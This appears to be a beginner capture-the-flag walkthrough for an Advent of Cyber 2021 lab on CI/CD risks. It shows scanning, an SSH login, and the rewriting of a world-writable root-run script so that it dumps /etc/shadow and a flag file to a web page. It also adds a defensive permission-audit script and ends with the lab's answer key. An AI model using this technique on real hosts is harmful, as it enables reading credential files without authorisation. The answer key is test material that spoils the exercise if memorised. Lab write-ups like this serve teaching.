Welcome to Advent of Cyber 2021
In the 25 days leading up to Christmas, you can get started in cyber security by learning the basics each day and doing a new beginner-friendly security exercise.
day14
Learning objectives
- Understand the concept of CI/CD
- Overview of the risks associated with CI/CD
- Have a basic understanding of CI/CD exploit vectors
┌──(kali㉿kali)-[~]
└─$ dirb http://10.10.197.99 -o dirb-log
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb-log
START_TIME: Wed Dec 15 01:53:26 2021
URL_BASE: http://10.10.197.99/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.197.99/ ----
┌──(kali㉿kali)-[~]
└─$ sudo nmap -vv -sS -Pn -n -A -p- -T4 10.10.197.99 -o nmap-log
...
Discovered open port 80/tcp on 10.10.197.99
Discovered open port 22/tcp on 10.10.197.99
...
http://10.10.197.99/admin loads ls.html.
Connect over SSH. (mcskidy:Password1)
┌──(kali㉿kali)-[~]
└─$ ssh mcskidy@10.10.197.99 -p 22
The authenticity of host '10.10.197.99 (10.10.197.99)' can't be established.
ED25519 key fingerprint is SHA256:9kEyTFIOxOqgfya4ZMo+1VTqJ7nC4zuupBW619K7IZs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.197.99' (ED25519) to the list of known hosts.
mcskidy@10.10.197.99's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-1029-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information disabled due to load higher than 1.0
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
147 packages can be updated.
99 updates are security updates.
Last login: Thu Nov 11 12:50:44 2021 from 10.9.1.60
mcskidy@ip-10-10-197-99:~$
The SSH connection succeeded. Next, see which users exist.
mcskidy@ip-10-10-197-99:/home$ ll
total 24
drwxr-xr-x 6 root root 4096 Nov 11 08:27 ./
drwxr-xr-x 23 root root 4096 Dec 14 16:47 ../
drwxr-xr-x 5 mcskidy mcskidy 4096 Nov 11 08:03 mcskidy/
drwxr-xr-x 2 pepper pepper 4096 Nov 11 08:27 pepper/
drwxr-xr-x 7 thegrinch thegrinch 4096 Nov 11 19:50 thegrinch/
drwxr-xr-x 5 ubuntu ubuntu 4096 Nov 11 05:52 ubuntu/
Check what is in /home/thegrinch/scripts.
mcskidy@ip-10-10-197-99:/home/thegrinch/scripts$ ll
total 20
drwxr-xr-x 2 root root 4096 Nov 11 20:03 ./
drwxr-xr-x 7 thegrinch thegrinch 4096 Nov 11 19:50 ../
-rwx------ 1 root root 286 Nov 11 20:03 check.sh*
-rwx------ 1 root root 58 Nov 11 09:00 cleanup.sh*
-rwxrwxrwx 1 root root 61 Nov 11 19:56 loot.sh*
-rwx------ 1 root root 0 Nov 11 07:58 test.sh*
Check whether /etc/shadow, which holds the password information, can be read.
mcskidy@ip-10-10-197-99:~$ less /etc/shadow
/etc/shadow: Permission denied
Now look at the loot.sh found earlier.
mcskidy@ip-10-10-197-99:/home/thegrinch/scripts$ less loot.sh
# !/bin/bash
ls /home/thegrinch/loot > /var/www/html/ls.html
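loot.sh is world-writable (-rwxrwxrwx) and redirects its output into /var/www/html/ls.html, the file that the /admin page loads. Try changing this shell script to see whether /etc/shadow can be read that way.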
mcskidy@ip-10-10-197-99:/home/thegrinch/scripts$ cat loot.sh
# !/bin/bash
cat /etc/shadow > /var/www/html/ls.html
Check whether /home/thegrinch/Desktop can be viewed. Found flag.txt. However, Desktop is drwxr-xr-x.
mcskidy@ip-10-10-197-99:/home/thegrinch$ ll
total 44
drwxr-xr-x 7 thegrinch thegrinch 4096 Nov 11 19:50 ./
drwxr-xr-x 6 root root 4096 Nov 11 08:27 ../
-rw------- 1 thegrinch thegrinch 33 Nov 11 07:46 .bash_history
-rw-r--r-- 1 thegrinch thegrinch 220 Nov 11 05:53 .bash_logout
-rw-r--r-- 1 thegrinch thegrinch 3771 Nov 11 05:53 .bashrc
drwx------ 2 thegrinch thegrinch 4096 Nov 11 05:58 .cache/
drwx------ 3 thegrinch thegrinch 4096 Nov 11 05:58 .gnupg/
-rw-r--r-- 1 thegrinch thegrinch 807 Nov 11 05:53 .profile
-rw-r--r-- 1 thegrinch thegrinch 0 Nov 11 05:58 .sudo_as_admin_successful
drwxr-xr-x 2 root root 4096 Nov 11 19:50 Desktop/
drwxrwxrwx 2 root root 4096 Nov 11 20:11 loot/
drwxr-xr-x 2 root root 4096 Nov 11 20:03 scripts/
mcskidy@ip-10-10-197-99:/home/thegrinch$ ls Desktop/
flag.txt
So, make good use of the cat command.
mcskidy@ip-10-10-197-99:/home/thegrinch$ cat Desktop/flag.txt
cat: Desktop/flag.txt: Permission denied
Consider another route.
mcskidy@ip-10-10-197-99:/home/thegrinch/scripts$ cat loot.sh
# !/bin/bash
cat /home/thegrinch/Desktop/flag.txt > /var/www/html/ls.html
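A defender-side check for the permission problem this walkthrough relies on, the -rwxrwxrwx mode on loot.sh, as an added example that is not part of the original write-up. The function names and the temporary sample directory are constructed for illustration; the file names and modes are copied from the scripts listing above.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit a directory of
# automation scripts for the permission problem seen on loot.sh.

# audit_scripts DIR: print one finding per line.
#   world-writable FILE  - any local user can change what the script does
#   group-writable FILE  - any member of the file's group can
#   open-dir DIR         - world-writable directory without the sticky bit,
#                          so files inside it can be replaced or renamed
audit_scripts() {
    find "$1" -type f -perm -002 -print | sed 's/^/world-writable /'
    find "$1" -type f -perm -020 ! -perm -002 -print | sed 's/^/group-writable /'
    find "$1" -type d -perm -002 ! -perm -1000 -print | sed 's/^/open-dir /'
}

# harden_scripts DIR: remove group/other write bits from files and directories.
harden_scripts() {
    find "$1" \( -type f -o -type d \) \( -perm -020 -o -perm -002 \) \
        -exec chmod go-w {} +
}

# make_sample: build a constructed copy of the scripts listing
# (same names and modes; contents are placeholders) and print its path.
make_sample() {
    d=$(mktemp -d) || return 1
    for f in check.sh cleanup.sh loot.sh test.sh; do
        printf '#!/bin/bash\n' > "$d/$f"
        chmod 700 "$d/$f"
    done
    chmod 777 "$d/loot.sh"      # -rwxrwxrwx, as in the listing
    printf '%s\n' "$d"
}

sample=$(make_sample)
echo "before:"; audit_scripts "$sample"
harden_scripts "$sample"
echo "after:";  audit_scripts "$sample"
rm -rf "$sample"
```

On the real host the audit would be pointed at the scripts directory and run by an account that can read it; the mode bits alone decide what is reported, whoever owns the files.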
Answer
How many pages did the dirb scan find with its default wordlist?
4
How many scripts do you see in the /home/thegrinch/scripts folder?
4
What are the five characters following $6$G in pepper's password hash?
ZUP42
What is the content of the flag.txt file on the Grinch's user’s desktop?
DI3H4rdIsTheBestX-masMovie!